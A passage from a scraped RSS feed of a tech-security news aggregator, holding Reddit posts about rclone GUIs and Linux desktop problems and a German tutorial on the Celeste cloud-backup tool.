attack well beyond its initial compromise.</p><p>To adapt to this evolving threat landscape, organizations must move beyond reactive crisis management and embrace a proactive, intelligence-driven defense strategy. Continuous dark web monitoring, early breach detection, and the integration of cyber threat intelligence into response workflows are now essential. In a world where stolen data functions as a tradable commodity, resilience depends not on negotiation but on vigilance, preparedness, and rapid action.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[OC] I was frustrated with the lack of good Rclone GUIs, so I built my own: RClone Manager (Tauri + Rust)]]></title>
<description><![CDATA[Hey r/linux! When I switched to Linux full-time a few years ago, one of the biggest challenges I faced was easily accessing my cloud storage services (Google Drive, OneDrive, Yandex Disk, etc.). I quickly discovered the incredibly powerful CLI tool, rclone. However, constantly writing commands in...]]></description>
<link>https://tsecurity.de/de/3078219/linux-tipps/oc-i-was-frustrated-with-the-lack-of-good-rclone-guis-so-i-built-my-own-rclone-manager-tauri-rust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3078219/linux-tipps/oc-i-was-frustrated-with-the-lack-of-good-rclone-guis-so-i-built-my-own-rclone-manager-tauri-rust/</guid>
<pubDate>Tue, 04 Nov 2025 02:36:55 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey <a href="https://www.reddit.com/r/linux">r/linux</a>!</p> <p>When I switched to Linux full-time a few years ago, one of the biggest challenges I faced was easily accessing my cloud storage services (Google Drive, OneDrive, Yandex Disk, etc.). I quickly discovered the incredibly powerful CLI tool, <code>rclone</code>.</p> <p>However, constantly writing commands in the terminal or trying to automate everything with <code>systemd</code> services (I even <a href="https://github.com/Hakanbaban53/Useful-Scripts/tree/main/rclone-systemd">wrote a script for it</a>) became tiresome after a while.</p> <p>When I looked for existing Rclone UIs, I found that most of them were either unmaintained, didn't offer the modern features I was looking for, or were simply buggy.</p> <p>So, to scratch my own itch, I started developing my own open-source project: <strong>RClone Manager</strong>.</p> <h1>What is RClone Manager?</h1> <p>RClone Manager is a GUI that brings the full power of <code>rclone</code> into a fast, modern desktop application, built using <strong>Tauri (Rust)</strong> and <strong>Angular (TypeScript)</strong>. My goal is to enable even new Linux users to manage their cloud storage accounts without needing to touch the terminal.</p> <p>The project is fully open-source under the <strong>GPLv3+</strong> license.</p> <p><a href="https://preview.redd.it/hogk6kulp1zf1.png?width=1373&amp;format=png&amp;auto=webp&amp;s=d4d65c6d4ce4b0b30eb3c59561d91dccb54bda5b">Main UI</a></p> <h1>🎯 Key Features:</h1> <p>Here's what you can do with the current version:</p> <ul> <li><strong>🛠 Comprehensive Remote Management:</strong> Easily add, edit, delete, or clone remotes using an intuitive wizard.</li> <li><strong>🔐 OAuth &amp; Interactive Setup:</strong> Seamless browser-based authentication for popular services like OneDrive, Google Drive, and iCloud.</li> <li><strong>🔑 Encrypted Configuration Support:</strong> Securely stores your passwords using your system's native keyring (Keyring / Credential Store).</li> <li><strong>📁 Mount Cloud Storage:</strong> Mount your cloud accounts as local drives (with support for mount, mount2, and NFS).</li> <li><strong>🔄 Sync &amp; Copy:</strong> Perform one-way synchronization and file copying between remotes or local folders.</li> <li><strong>↔️ Bidirectional Sync (Bisync):</strong> Keep two locations (e.g., your local folder and the cloud) perfectly in sync in both directions.</li> <li><strong>🚚 Move Operations:</strong> Transfer files from one location to another without leaving copies behind.</li> </ul> <h1>Feedback and Contribution</h1> <p>The main reason I'm sharing this project is to get <strong>feedback</strong> from you all.</p> <ul> <li>What difficulties did you face while testing the app?</li> <li>What do you think could be better?</li> <li>What "must-have" features do you think are missing?</li> </ul> <p>I'm aiming for this to be a tool that can solve the cloud storage problem, especially for people new to Linux. All your feedback and contributions are incredibly valuable for making the project better.</p> <h1>🔗 Links</h1> <ul> <li><strong>GitHub Repo (Code &amp; Downloads):</strong> <a href="https://github.com/Zarestia-Dev/rclone-manager">https://github.com/Zarestia-Dev/rclone-manager</a></li> </ul> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Hakanbaban53"> /u/Hakanbaban53 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1onc1dz/oc_i_was_frustrated_with_the_lack_of_good_rclone/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1onc1dz/oc_i_was_frustrated_with_the_lack_of_good_rclone/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Any Linux developer to try and make a real-time syncing wrapper for RClone?]]></title>
<description><![CDATA[Recently I was thinking of migrating to Linux, but I saw one flaw in my workflow in Linux: it hasn't any "Google Drive" syncing tool. RClone hasn't real-time sync or detect changes in local or cloud, Gnome/KDE neither, and insync is a paid closed-source software. Having a tool to sync your files ...]]></description>
<link>https://tsecurity.de/de/3038328/linux-tipps/any-linux-developer-to-try-and-make-a-real-time-syncing-wrapper-for-rclone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3038328/linux-tipps/any-linux-developer-to-try-and-make-a-real-time-syncing-wrapper-for-rclone/</guid>
<pubDate>Tue, 14 Oct 2025 03:37:25 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Recently I was thinking of migrating to Linux, but I saw one flaw in my workflow in Linux: it hasn't any "Google Drive" syncing tool. RClone hasn't real-time sync or detect changes in local or cloud, Gnome/KDE neither, and insync is a paid closed-source software.</p> <p>Having a tool to sync your files locally is useful if you want to keep working even if you lose connection, so after reconnecting, it just syncs automatically if you made changes. Also, this way you can open big files without waiting for it to download each time.</p> <p>So, seeing there aren't any alternatives, it occur to me try to research options, and I think I have a lead, but I'm not in any case an expert developer, so I share this both to see if it would be possible, and hope someone would try to implement it if it's useful.</p> <p><strong>Make RClone to be real-time 2-way sync</strong></p> <ol> <li>The user configures rclone the usual way, configuring their remote (ie, Google Drive)</li> <li>Then, the user choose in what local folder will it sync (ie, /home/name/Documents/Cloud)</li> <li>The wrapper/program will use rclone sync command to sync the remote cloud with the local folder, so now it downloads all the data to make it a mirror. Once this is done:</li> <li><strong><em>If the user makes local changes</em></strong> -&gt; inotifyd detects it (new, modified, deleted, moved) and fires the "rclone sync" command but only for that changes, avoiding a complete sync over all the data.</li> <li><strong><em>If the user makes remote changes</em></strong> -&gt; Every 2-5 minutes it runs rclone lsf, looking only for the files with modification date of last 24h for example, and compares them (hash or modification date) to local; if newer, then sync only those files to local with RClone. Also, from time to time or every boot, make a complete check to be sure the cloud and local are mirrors, maybe just checking files and folders hashes from top to bottom, to try and check + sync only the neccesary things.</li> </ol> <p>This way, we would have a real alternative to Google Drive Sync from Windows/Mac in Linux?</p> <p>What do you think, is it possible or is it flawed? It's just an idea, I doubt I would be able to develop myself something like this...</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/onechroma"> /u/onechroma </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1o5y70q/any_linux_developer_to_try_and_make_a_realtime/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1o5y70q/any_linux_developer_to_try_and_make_a_realtime/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux desktop is attracting new users, and that's good, but we must be critical of everything that needs improvement]]></title>
<description><![CDATA[I recently returned to Linux after a 2-3 year absence, and I was surprised by how well it has evolved on the desktop. More stability, compatibility with more software, mature DEs... it's a real pleasure. However, I also notice that the Linux community has some areas for improvement from different...]]></description>
<link>https://tsecurity.de/de/3008266/linux-tipps/linux-desktop-is-attracting-new-users-and-thats-good-but-we-must-be-critical-of-everything-that-needs-improvement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3008266/linux-tipps/linux-desktop-is-attracting-new-users-and-thats-good-but-we-must-be-critical-of-everything-that-needs-improvement/</guid>
<pubDate>Sun, 28 Sep 2025 03:51:53 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I recently returned to Linux after a 2-3 year absence, and I was surprised by how well it has evolved on the desktop. More stability, compatibility with more software, mature DEs... it's a real pleasure.</p> <p>However, I also notice that the Linux community has some areas for improvement from different points of view (its organization, how it welcomes newbies, software, etc.). I'm writing this post just to see if others see the same things I do. If not, that's fine, you can give your opposing opinion and debate it, no need to lynch me. Here we go:</p> <ol> <li>Dependence on large companies. Yes, I know, they are precisely the ones that finance and support Linux the most, but at the same time, they do nothing but twist the community to their liking, sometimes damaging it. We have Canonical imposing its Snaps on Ubuntu, even hijacking you when you try to install using "sudo apt install", probably the most well-known distro among the general public. In addition, more recently, there has been some debate about replacing GNU tools with a rewrite in RUST that will be licensed under MIT (more permissive, allowing those who benefit from the code and modify it to not have to share the result, privatizing it).</li> </ol> <p>We also have Red Hat, which two years ago decided to restrict access to the RHEL source code to the community, citing that others were benefiting “unfairly” from that access, as other companies (ie, CIQ) were creating clones of RHEL and then offering support and charging for it.</p> <p>All these developments don't seem positive for the Linux community and are reminiscent of how Microsoft treats Windows, which is manipulated like their toy. Of course, there are still other “community” distributions, such as Debian or Arch, although they are not as easy for beginners to get started with.</p> <p>2) Division of efforts. It is in the nature of Linux that everyone can create their own “home,” and therefore, it is inevitable that there will be hundreds of distributions, but when there is none that is capable of being “perfect” for the general public (there is always some drawback, however small, in Gnome, KDE, Cinnamon...), it seems incredible that efforts continue to be divided even further. We have the PopOS! team as example, although they started well and gained some popularity in their day, now they seem to think it is worthy their time and effort to create another new DE (COSMIC), just... because? Until in the end, we have almost as many DEs as distributions, and some with very little usage (how many people use Budgie? What future will MATE have?).</p> <p>I understand that customization is the soul of Linux, but sometimes it feels like it weighs it down a lot. “Divide and conquer,” they said about the vanquished.</p> <p>3) Lack of consistency. Similar to the above, in Linux you can do anything, that's clear, but it won't help its “mass” adoption if the instructions for doing basic things change so much depending on the distribution or DE. Sometimes, even what is compatible can be affected by things that the casual user doesn't understand (X11 vs Wayland, for example).</p> <p>4) Comfort with using “advanced” applications or settings. For example, no one is incentivized to build open-source software that synchronizes clouds (Google Drive, OneDrive, and others, similar to InsyncHQ, with active real-time synchronization), because advanced users have more than enough with RClone and the terminal. Or in specific configurations, the terminal is still unavoidable. If you want to install drivers for an HP Laserjet printer, you'll have to go through the terminal. Want to install Warp VPN? Terminal! It's not bad at all, don't get me wrong, but it makes me angry that there is still a certain complacency that prevents Linux from being “chewed up” a little more to attract the general public, which would help popularize Linux and make more native software compatible.</p> <p>5) Lack of attention to cybersecurity. Beginners are often told not to worry, that “there is no malware” on Linux desktops. At the same time, we have seen how Arch's AUR repository has been detected with malware, or how certain vulnerabilities have affected Linux this year (Sudo having a PAM vulnerability allowing full root access, two CUPS bugs that let attackers remote DoS and bypass auth, DoS flaw in the kernel's KSMBD subsystem, Linux kernel vulnerability exploited from Chrome renderer sandbox... And all of that, only in the last 2 months).</p> <p>Related to this are questionable configurations, such as trusting Flatpak 100%, even though the software available there can often be packages created by anonymous third parties and not the original developer, or the use of browsers installed in this way, even though this means that the browser's own sandbox is replaced by Flatpak's sandboxing.</p> <p>6) Updates that have the capacity to break entire systems, to the point of recommending reinstalling the system from scratch in some cases. This is almost on par with Windows or worse, depending on the distribution and changes that have taken place. It is well known that in Linux, depending on the distro, updating is a lottery and can leave you without a system. This should be unacceptable, although understandable, given that Linux is still a base (monolithic kernel with +30M lines) with a bunch of modules linked together on top, each one different from the other. In the end, it is very easy for things to break when updating.</p> <p>In part, immutable distributions help with this, allowing you to revert to a previous state when, inevitably, the day comes when the system breaks, unless you can afford to have a system with hardly any modifications, with software as close to a “clean” state as possible.</p> <p>If the system breaks and you are not on an immutable distribution, you have already lost the casual user.</p> <p>At the end, I want to love Linux, but I see that many of the root causes preventing its popularity from growing (on the desktop, I'm not counting its use as a kernel for heavily modified things like Android, or its use by professional people in servers) haven't consideribly improved. The community remains deeply divided, fighting amongst itself even on some issues, and continues to scare away the general public who come with the idea of “just having work done”.</p> <p>Because of all this, a few days ago, I was surprised to see that Linux in the Steam survey remains at 2.64%. It's better than the 1.87% from just a year ago (Sept. 24), of course, and I suppose SteamDecks have helped a lot too, but it's a shame that it's not able to attract the audience that is migrating elsewhere on Windows (Windows 11 went from 47.69% to 60.39% in the same period, even with all the TPM thing that will make millions of PCs "incompatible" with Win11). In other words, for every person who switched to Linux in the survey, more than 16 people switched to Windows 11.</p> <p><strong>What are your thoughts on improving Linux (if it were up to you)? Do you think there will come a time when Linux will have a significant share of the desktop market, so that it will at least be taken into account in software development?</strong></p> <p>(And please, I would ask that haters refrain from contributing nothing, simply accusing me of something or telling me to “go to Windows.” I hate gatekeeping and not being able to have real discussions sometimes in this community. Thank you).</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/onechroma"> /u/onechroma </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ns8qzz/linux_desktop_is_attracting_new_users_and_thats/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ns8qzz/linux_desktop_is_attracting_new_users_and_thats/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Celeste: Visuelles Backup-Tool für Linux auf Rclone-Basis]]></title>
<description><![CDATA[Für Profis gibt es seit gut zehn Jahren das Programm Rclone, das per Script Daten und Verzeichnisse zwischen dem lokalen Computer und einer Vielzahl von Cloudservices synchronisiert. 



Es arbeitet sehr zuverlässig, lässt sich aber nur im Terminal bedienen und erfordert eine gewisse Einarbeitung...]]></description>
<link>https://tsecurity.de/de/2970531/windows-tipps/celeste-visuelles-backup-tool-fuer-linux-auf-rclone-basis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2970531/windows-tipps/celeste-visuelles-backup-tool-fuer-linux-auf-rclone-basis/</guid>
<pubDate>Sun, 07 Sep 2025 09:07:14 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Für Profis gibt es seit gut zehn Jahren das Programm <a href="https://github.com/rclone/rclone" target="_blank" rel="noreferrer noopener">Rclone</a>, das per Script Daten und Verzeichnisse zwischen dem lokalen Computer und einer Vielzahl von <strong>Cloudservices </strong>synchronisiert. </p>



<p>Es arbeitet sehr zuverlässig, lässt sich aber nur im Terminal bedienen und erfordert eine gewisse Einarbeitung, bis die gewünschten Verzeichnisse wunschgemäß zwischen der lokalen Festplatte und dem Cloudspeicher der Wahl synchronisiert werden. Mit <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> wird es einfacher.</p>



<h2 class="wp-block-heading toc">Installation von Celeste</h2>



<p>Der Entwickler Hunter Wittenborn bietet mit seinem Programm <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> eine Arbeitserleichterung für <strong>Cloudbackups </strong>an. Celeste kommt mit einer grafischen Oberfläche, über die Sie alle notwendigen Einstellungen vornehmen können. </p>



<p>Technisch setzt Celeste auf <a href="https://github.com/rclone/rclone" target="_blank" rel="noreferrer noopener">Rclone</a> auf, ist also ein grafisches Frontend für Rclone. Aktuell hat es bereits die wichtigsten Clouddienste wie Google Drive, Dropbox, Proton Drive oder pCloud integriert. Weitere sollen laut Entwickler schrittweise folgen. </p>



<p>In der Zwischenzeit können Sie bei Bedarf auch auf <strong>Webdav </strong>zurückgreifen, welches auch bereits in Celeste integriert wurde.</p>



<p>Wir zeigen in diesem Workshop, wie Sie <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> für Ihren Clouddienst konfigurieren und Ihre Daten automatisiert im Hintergrund synchronisieren. </p>



<p>Für die Installation von Celeste stehen Ihnen verschiedene Wege zur Verfügung. Der Entwickler bietet das aktuelle Paket als Flatpak über Flathub und als Snap über den Ubuntu Snapstore.</p>



<p>Als Snap installieren Sie <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> mit diesem Kommando:</p>



<pre class="wp-block-code"><code>sudo snap install celeste</code></pre>



<p>Eine deutsche Übersetzung von <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> ist bereits vorhanden, allerdings scheint es an dieser Stelle beim einen oder anderen Menü noch ein paar Probleme zu geben. </p>



<p>Grundsätzlich ist die Oberfläche jedoch einfach gehalten und weitgehend selbsterklärend.</p>



<h2 class="wp-block-heading toc">Anbindung von Cloudspeicher-Diensten</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68bd2e8d8cb5a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_2.jpg?quality=50&amp;strip=all" alt="Bevor Celeste mit der Synchronisation beginnen kann, müssen Sie den Zugriff auf den Cloudspeicher-Dienst explizit erlauben (in diesem Beispiel Dropbox)." class="wp-image-2889335" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_2.jpg?quality=50&amp;strip=all 1140w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_2.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_2.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_2.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bevor Celeste mit der Synchronisation beginnen kann, müssen Sie den Zugriff auf den Cloudspeicher-Dienst explizit erlauben (in diesem Beispiel Dropbox).</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Haben Sie noch keine Cloudspeicher eingebunden, sehen Sie beim Aufruf von <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> erst einmal nur ein kleines Log-in-Fenster, bei dem Sie den „Server Type“ auswählen und den Namen festlegen können. </p>



<p>Im Auswahlfeld sehen Sie, welche Dienste und Protokolle aktuell innerhalb von Celeste zur Verfügung stehen. Im Feld „Name“ wird nicht Ihr Log-in-Name bei der Cloud erwartet, sondern ein beliebig wählbarer Bezeichner, unter dem Sie die Anbindung später in der Übersicht finden.</p>



<p>Wir haben zunächst eine Verbindung zum Clouddienst Dropbox ausprobiert. Hierfür sind lediglich Ihre E-Mail-Adresse sowie das zugehörige Passwort notwendig. Diese geben Sie in das Browserfenster ein, das automatisch durch <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> geöffnet wird, nachdem Sie den ersten Schritt der Einrichtung erledigt haben.</p>



<p>Zum Abschluss der Einrichtung geben Sie noch den Zugriff von <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> auf Dropbox frei und danach steht diese Verbindung für Celeste zur Verfügung.</p>



<p>Nun beginnt die eigentliche Einrichtung der Synchronisation. Diese ist regelbasiert, allerdings steht aktuell lediglich die Option des bidirektionalen Abgleichs zur Verfügung. </p>



<p>Wird eine Datei in der Cloud verändert, überträgt <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> diese automatisch auf dem lokalen System und überschreibt die aktuelle Version. </p>



<p>Haben Sie zwischen zwei Synchronisationspunkten sowohl die lokale als auch die in der Cloud gespeicherte Datei verändert, fragt Celeste nach, welche Version Sie behalten möchten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68bd2e8d8d3bc"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_3.jpg?quality=50&amp;strip=all" alt="Ausnahmeregeln: Celeste akzeptiert für jedes Synchronisationspaar Ausnahmeregeln, um bestimmte Dateien oder ganze Ordner auszuschließen." class="wp-image-2889344" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_3.jpg?quality=50&amp;strip=all 1140w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_3.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_3.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_3.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Ausnahmeregeln: Celeste akzeptiert für jedes Synchronisationspaar Ausnahmeregeln, um bestimmte Dateien oder ganze Ordner auszuschließen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Für die Synchronisation hinterlegen Sie im Feld „Local Folder“ das Verzeichnis auf Ihrem System, das Sie synchronisieren möchten. Am einfachsten nutzen Sie das Ordner-Symbol, um das Verzeichnis per Mausklicks auszuwählen. </p>



<p>Den Zielordner geben Sie in das Feld „Remote Folder“ ein – dieser muss in jedem Fall vorhanden sein, da <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> ihn bei der ersten Synchronisation nicht anlegen kann. Sollten Sie lediglich „/“ angeben, werden alle Dateien ins root-Verzeichnis Ihres Clouddienstes synchronisiert.</p>



<p>Nachdem Sie die Verknüpfung angelegt haben, beginnt <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> sofort mit der Arbeit und gleicht die beiden Ordner miteinander ab. Falls Sie nicht alle Dateien oder Dateitypen in die Synchronisation einbeziehen möchten, gibt es die Möglichkeit, Ausschlussregeln zu definieren. </p>



<p>Dazu klicken Sie die entsprechende Synchronisationsregel an und landen automatisch in der Übersicht „File/Folder Exclusions“. An dieser Stelle geben Sie die Dateien oder Unterverzeichnisse an, die Celeste nicht abgleichen soll.</p>



<p>Das Tool ermöglicht es Ihnen, nicht nur ein Verzeichnis pro Dienst zu synchronisieren, sondern mehrere Regeln festzulegen. </p>



<p>Dies macht beispielsweise dann Sinn, wenn Sie Dokumente und Bilder in unterschiedlichen Verzeichnissen auf Ihrem Computer festgelegt haben. Nutzen Sie am besten einen sprechenden Namen für die jeweilige Regel, damit Sie diese im weiteren Verlauf auseinanderhalten können.</p>



<h2 class="wp-block-heading toc">Verbindung per Webdav</h2>



<p>Da die aktuelle Anzahl der Cloudspeicher noch überschaubar ist, hat der Entwickler in seine Anwendung zusätzlich das Webdav-Protokoll integriert. Dieses erlaubt es Ihnen, mit Hilfe des Netzwerkprotokolls Daten übers LAN oder das Internet zu synchronisieren. </p>



<p>Unterstützt der Cloudspeicher-Anbieter dieses Protokoll, müssen Sie lediglich den Webdav-Servernamen sowie den zugehörigen Benutzer und das Passwort eingeben. Danach beginnt <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> mit der Synchronisation der Verzeichnisse. </p>



<p>Auch bei dieser Methode gibt es analog zu den klassischen Webspeichern wieder die Möglichkeit, Dateien oder Verzeichnisse von der Synchronisation auszuschließen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68bd2e8d8dca7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_4.jpg?quality=50&amp;strip=all" alt="Für die Definition einer Webdav-Verbindung benötigen Sie die Adresse des Servers und die persönlichen Anmeldedaten." class="wp-image-2889345" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_4.jpg?quality=50&amp;strip=all 916w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_4.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_4.jpg?resize=768%2C433&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/08/celeste_backup_tool_4.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="916" height="516" sizes="auto, (max-width: 916px) 100vw, 916px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Für die Definition einer Webdav-Verbindung benötigen Sie die Adresse des Servers und die persönlichen Anmeldedaten.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> unterstützt auch die Anbindung zu einer persönlichen Nextcloud oder Owncloud. Für den Zugriff auf diese Serverdienste ist die Adresse des Servers sowie ein zugehöriger Benutzer samt Passwort notwendig. </p>



<p>Dabei spielt es keine Rolle, ob sich der Server in Ihrem lokalen Netzwerk befindet oder Sie diesen als eigenen Internet-Cloudspeicher betreiben. Der Server muss lediglich aus dem Netzwerk erreichbar sein, in welchem sich der Rechner mit Celeste befindet.</p>



<p>Datensicherung kann so einfach sein Gute Gründe für Cloudbackups gibt es mehrere: Nicht nur die Datensicherung kann ein Motiv sein, sondern auch die Tatsache, dass die Daten dann auch für andere Geräte oder Nutzer im Internet erreichbar sind. </p>



<p>Durch die Verwendung von Rclone setzt <a href="https://github.com/hwittenborn/celeste?tab=readme-ov-file" target="_blank" rel="noreferrer noopener">Celeste</a> auf einer stabilen Basis auf, bietet aber zusätzlichen Komfort: Sie können auf die Nutzung des Terminals verzichten und Ihre Verbindungen bequem über die grafische Oberfläche einpflegen und warten.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I run lts-kernel and firefox-esr. What are your lts picks?]]></title>
<description><![CDATA[lts-kernel: https://www.phoronix.com/news/Btrfs-Log-Tree-Corruption-Fix firefox-esr: https://www.ghacks.net/2025/07/22/firefox-141-introduces-local-ai-to-help-with-tab-management/ .. and there's endless more examples ..  Stable is not stable enough. I enjoy the latest packages of other software -...]]></description>
<link>https://tsecurity.de/de/2934374/linux-tipps/why-i-run-lts-kernel-and-firefox-esr-what-are-your-lts-picks/</link>
